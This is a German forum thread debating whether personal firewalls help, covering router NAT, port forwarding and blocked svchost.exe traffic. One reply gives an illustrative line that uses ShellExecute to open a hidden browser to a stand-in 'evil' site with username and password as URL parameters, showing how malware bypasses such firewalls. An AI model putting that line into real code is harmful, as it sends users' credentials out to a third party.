Zitat:

Naja die PFW kann nur mit Prozess Injection umgangen werden

Naja, es gibt auch einfachere Tricks. Eingehenden Traffic, zum Filtern von "offenen" Ports, daist der Router ja schon die Barriere.
Ausgehenden Traffic kannst du nicht zuverlässig blockieren.

Mit

Code: Alles auswählenAufklappen

ATTFilter

ShellExecute(NULL, "open","http://www.poehseseite.com/?var1=$username&var2=$password", NULL,NULL, SW_HIDE);
         

Kann man im default Browser "sensible" Daten von einer "bösen" Seite aufrufen. Die PFW wird davon nichts mitbekommen, es sei denn bei JEDEM Traffic wirst du um Erlaubnis gefragt, aber das tut sich keiner an diese Klickorgie. Oder nickst du jede Verbindungsanfrage vom Firefox, Opera oder IE manuell ab?

=> Use ShellExecute to launch the default Web browser

Zitat:

Jedoch fühle ich mich einfach Sicherer, wenn ich weiß was für Daten aus meinen PC gelangen und welche hinein gelangen. Bzw. wenn ich weiß welche Prozesse Daten rein und rausschicken dürfen.

Gefühlte, vorgetäuschte "Sicherheit" durch eine PFW ist sinnfrei und gefährlich.
Also ich halte von solchen Spielerien wenig bis garnichts, v.a. wenn man schon einen Router hat, braucht man sich nun wirklich nicht mit zusätzlicher Software das System zu verhunzen. Nun gut, nun mag Win7 Firewall Control auf der Windows-Firewall aufbauen, dennoch liegt da die Gefahr hoch, ständig mit nervenden Meldungen überschüttet zu werden.

Lies einfach mal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de

Zitat:

Naja da ich ein Mensch bin der niemanden vertraut und es deswegen keine vertrauenswürdigen Programme für mich gibt. Und deswegen komme ich nicht dadran vorbei solche unvertrauenswürdigen Programme wie iTunes für meinen IPod zu installieren. Deswegen brauche ich eine PFW um solchen Programmen die Internetverbindung zu verbieten. Selbst Windows schickt teilweise Informationen unbemerkt durchs Internet...

Wer Apple nicht traut, sollte auch nicht unbedingt Produkte von ihnen nicht kaufen. Trotzdem wird es gemacht
Und wie bereits oben erwähnt, kannst du damit eben NICHT zuverlässig die Kommunikation nach außen hin kontrollieren oder verbieten.
Wenn du meinst Windows schickt "unbemerkt" Infos durchs Internet - welche Art von Infos sollen das sein? Wenn du glaubst, MS verletzt deine Privatssphäre und spioniert dich aus, warum hast du nicht schon längst Windows durch ein quelloffenes Betriebssystem ersetzt?

Zitat:

Ok, bin kein Experte in der Router Funktionsweise, ich dachte der Router hat für bestimmte Standard Internet Dienste bestimmte Standard Ports offen, wie z.B zum Surfen den Port 80.

Ja, Port 80 - und nicht nur dieser - ist ausgehend erlaubt. Das hat nichts damit zu tun, wenn du zB einen Apache auf deinen Rechner laufen hast, ist dieser nicht automatisch aus dem Internet erreichbar, dazu muss ein Portforwarding im Router eingestellt sein.
Auf dem Router selbst sollte Port 80 nur intern geöffnet sein, es sei denn man konfiguriert den Router so, dass seine webbrowserbasierte Konfigseite auch aus dem Internet erreichbar ist.

Zitat:

über diese der Router dann auch Pakete empfangen kann und an mich weiterleiten. Und alle Anfragen die richtung Router gehen, ohne das eine Verbindung aufgebaut ist werden auf Grund der NAT blockiert, oder liege ich da falsch?

Genau das ist ja auch Sinn und Zweck eines Routers. Hat aber immer noch nichts damit zu tun, dass ein lauschender Dienst nur dadurch erreichbar ist, wie gesagt muss ein Portforwarding eingerichtet werden, falls du meinst es wäre irgendeine Art "Risiko".

Zitat:

B2T: eigentlich geht es mir darum, zu wissen was diese Fehlermeldung bedeutet und wie ich es herausfinden kann. So wie es aussieht, müsste ja ein Windows Dienst versuchen eine Internetverbindung aufzubauen und die PFW blockt dann alle eingehenden Datenpakete. Wenn das so ist würde ich gerne wissen welche Dienst es ist... und wieso ich selbst mit der Funktion "ErlaubeAlle" diese Datenpakete weiterhin blockiere...

Bei "Hostprozess für Windows-Dienste" kann es sich eigentlich nur um svchost.exe handeln. Den zu blockieren macht genau Null Sinn, da er ein Hüllenprozess für im Grunde andere Dienste jeder Art darstellt. Wenn du den blockierst - und mehr kannst du ja anscheinend nicht, wenn du nur prozessabbildnamenbasierte Regeln erstellen kannst - können sehr viele legitime Windows-Dienste logischerweise auch nicht mehr über das Internet kommunizieren.

Zitat:

Zitat von cosinus

Nun gut, nun mag Win7 Firewall Control auf der Windows-Firewall aufbauen, dennoch liegt da die Gefahr hoch, ständig mit nervenden Meldungen überschüttet zu werden.

Naja, ich bekomme vllt einmal im Monat, wenn ich mal etwas installiere ne Meldung und wirklich viel Ressourcen verbraucht die PFW nicht, ich kann mich also nicht über Nachteile, dieser PFW beschweren.

Zitat:

Zitat von cosinus

Lies einfach mal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de

Ok, dass PFWs keine Wirkliche Sicherheit vor Malware bringen hab ich jetzt auch verstanden, aber das ist ja auch nicht der einige Grund, warum ich eine PFW benutze.

Zitat:

Zitat von cosinus

Wer Apple nicht traut, sollte auch nicht unbedingt Produkte von ihnen nicht kaufen. Trotzdem wird es gemacht

Ich vertraue Apple schon soweit, dass sie nur das machen was sie in ihren 100k Seiten Geschäftsbedingungen einem versuchen auf möglichst umständliche Weise zu erklären. Außerdem gibt es fast keine Firmen mehr die gar keine Nutzer Aktivitäten zur Vermarktung abspeichern.
Außerdem kann es ja auch mal passieren, dass man bei einem kostenpflichtigen Programm "ausversehen" einen falschen Serial-Code eingibt der dennoch funktioniert und auf Grund der Datenübermittlung zwischen diesem Programm und dem Unternehmen rechtliche Probleme bekommt.

Zitat:

Zitat von cosinus

Und wie bereits oben erwähnt, kannst du damit eben NICHT zuverlässig die Kommunikation nach außen hin kontrollieren oder verbieten.
Wenn du meinst Windows schickt "unbemerkt" Infos durchs Internet - welche Art von Infos sollen das sein? Wenn du glaubst, MS verletzt deine Privatssphäre und spioniert dich aus, warum hast du nicht schon längst Windows durch ein quelloffenes Betriebssystem ersetzt?

Ich glaube nun nicht, dass MS irgendwelche Privaten Bilder oder meine Keyloggs oder so durchs Internet schickt. Aber ich glaube, dass bestimmte Dienste eindeutige Signaturen durchs Internet schicken, die bei Benutzung von Tor oder eines VPN Servers die Anonymität gefährden, da trotz wechselnder IP Kaskade am Ende immer bestimmte Datenpakete versendet werden, die sich jedes auf eine gewisse Art und Weise ähneln, so dass daraus wieder ein bestimmtes Profil zusammen gesetzt wird, welches wie eine IP Adresse fungiert.

Ich bin zur Zeit auch dabei mich ein wenig in Linux einzuarbeiten, aber ein schneller Umstieg fällt einem auch nicht ganz einfach wenn man mit Windoof aufgewachsen ist -.-

Zitat:

Zitat von cosinus

Bei "Hostprozess für Windows-Dienste" kann es sich eigentlich nur um svchost.exe handeln. Den zu blockieren macht genau Null Sinn, da er ein Hüllenprozess für im Grunde andere Dienste jeder Art darstellt. Wenn du den blockierst - und mehr kannst du ja anscheinend nicht, wenn du nur prozessabbildnamenbasierte Regeln erstellen kannst - können sehr viele legitime Windows-Dienste logischerweise auch nicht mehr über das Internet kommunizieren.

Windows7 Firewall Controll hat den Prozess svchost.exe Standardmäßig auf "read only" gestellt und etwas ändern kann ich an dieser Einstellung auch nicht.
Selbst wenn ich die Gesamte Firewall auf "ErlaubeAll" stelle, werden die Eingehenden Daten blockiert.
Aber trotz dieser Blockierung funktionieren alle Dienste, die ich benutze einwandfrei.
Kann es sein, dass Malware sich per DLL in die svchost.exe geschrieben hat und so versucht eine Verbindung aufzubauen? Hatte eben 2000 blockierte eingehende Verbindungsversuche.